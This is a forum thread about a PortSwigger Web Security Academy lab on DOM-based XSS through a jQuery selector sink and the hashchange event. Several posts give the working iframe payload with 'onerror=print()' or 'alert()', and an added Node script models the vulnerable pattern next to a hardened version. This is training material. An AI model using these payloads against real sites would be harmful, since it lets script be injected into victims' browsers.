Burp Suite User Forum

DOM XSS in jQuery selector sink using a hashchange event

boonjin | Last updated: Mar 15, 2022 01:13AM UTC

Hi, does anyone understand how the payload works for this?
```
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```
Why do we have to send it to the exploit server for this, and why do we have to trigger onerror=print()?

Hannah, PortSwigger Agent | Last updated: Mar 15, 2022 10:25AM UTC

Hi, you can find the learning for this lab here: https://portswigger.net/web-security/cross-site-scripting/dom-based#dom-xss-in-jquery You need to trigger "onerror=print()" because the goal of the lab is to execute the print() function in the victim's browser. The example in the learning materials calls "alert()" instead.

Eileen | Last updated: Nov 13, 2022 06:15AM UTC

1. If you use Burp Scanner, it would catch the following: "Data is read from location.hash and passed to jQuery.parseHTML."
2. If you look into DOM Invader's stack trace, you will notice parseHTML was found inside the jQuery Migrate 1.4.1 source code. This essentially means that jQuery's selector actually parses HTML.
3. You can test this by entering the following into the developer console and observing the alert pop-up box even though the image is invisible.
```
> $('<img src=x onerror=alert()');
```
4. What we need to do is replace the URL fragment portion with our IMG tag payload.
5. Since the page does not block iframes with X-Frame-Options, we can first set the iframe src to any dummy value and then update the src with our actual payload. The following payload would be easier to understand.
```
<html><body>
<iframe src="https://<LABID>.web-security-academy.net/#aaa"
        onload="this.src='https://<LABID>.web-security-academy.net/#<img src=x onerror=alert() >'"></iframe>
</body></html>
```

Eileen | Last updated: Nov 13, 2022 06:16AM UTC

Update typo for step 3.
```
> $('<img src=x onerror=alert() >');
```
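As an added example, not taken from this thread or from PortSwigger's lab code, the plain Node script below models the two points in the posts above: the relaxed jQuery Migrate 1.x rule that hands any selector containing a complete `<...>` tag to `jQuery.parseHTML` (which is why the missing `>` in step 3 mattered), and why `this.src+=` on an already-loaded iframe delivers the fragment as a `hashchange` rather than a fresh navigation. The regex and the leading-`#` rejection are reproduced from memory as an approximation of Migrate 1.4.1, the vulnerable handler is a constructed sketch of the pattern rather than the lab's source, and the lab host is a placeholder.

```javascript
// Added example, not from this thread or from PortSwigger's lab: a plain Node
// model of the jQuery selector sink. ASSUMPTION: the regex and the leading-'#'
// rejection are reproduced from memory as an approximation of jQuery Migrate
// 1.4.1's selector-as-HTML rule; check the real source before relying on it.
const MIGRATE_HTML_RULE = /^([^<]*)(<[\w\W]+>)([^>]*)$/;

// Migrate's relaxed rule: a string containing a complete "<...>" tag anywhere
// is handed to jQuery.parseHTML instead of the selector engine. The regex
// requires a closing ">", so a tag cut off before ">" never reaches parseHTML,
// which is why the step-3 typo above did not fire.
function migrateTreatsAsHtml(selector) {
  const m = MIGRATE_HTML_RULE.exec(selector.trim());
  return !!(m && m[0]) && m[1].charAt(0) !== '#';
}

// Constructed sketch of the vulnerable pattern (not the lab's real code): the
// fragment is decoded and concatenated straight into a selector string.
function vulnerableSelector(hash) {
  return 'h2:contains(' + decodeURIComponent(hash.slice(1)) + ')';
}

// Hardened variant: the fragment is treated as data, checked against an
// allow-list, and never spliced into selector text. The caller then compares
// it against heading text (e.g. $('h2').filter(...)) instead of building a selector.
function safeHeadingTitle(hash) {
  let title;
  try {
    title = decodeURIComponent(hash.slice(1));
  } catch (e) {
    return null; // malformed percent-encoding
  }
  return /^[\w ,.'-]{1,80}$/.test(title) ? title : null;
}

// Why "this.src += payload" works: appending to the src of an already-loaded
// iframe changes only the fragment, so the framed page receives a hashchange
// event instead of a fresh navigation. The URL parser percent-encodes "<", ">"
// and spaces in the fragment, but decodeURIComponent in the sink undoes that.
function resultingHash(iframeSrc, appended) {
  return new URL(iframeSrc + appended).hash;
}

// Stand-alone demo with a placeholder lab host.
const demoHash = resultingHash('https://LAB-ID-PLACEHOLDER.web-security-academy.net/#',
                               '<img src=x onerror=print()>');
console.log(demoHash);
console.log(vulnerableSelector(demoHash), '->', migrateTreatsAsHtml(vulnerableSelector(demoHash)));
console.log('hardened:', safeHeadingTitle(demoHash));
```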

Eileen | Last updated: Nov 13, 2022 06:29AM UTC

This youtube video has quite an excellent walkthrough and explanation: https://www.youtube.com/watch?v=CNIeel0VrN0

mraker | Last updated: Dec 07, 2022 03:11AM UTC

```
<iframe src="https://0abe005504009c9cc0b315b700d200a7.web-security-academy.net//#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```

bheam | Last updated: Feb 05, 2023 07:00AM UTC

Hi there, love to deliver the knowledge:
```
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```
To deliver this, please correct it with the alert() function. Thank you.
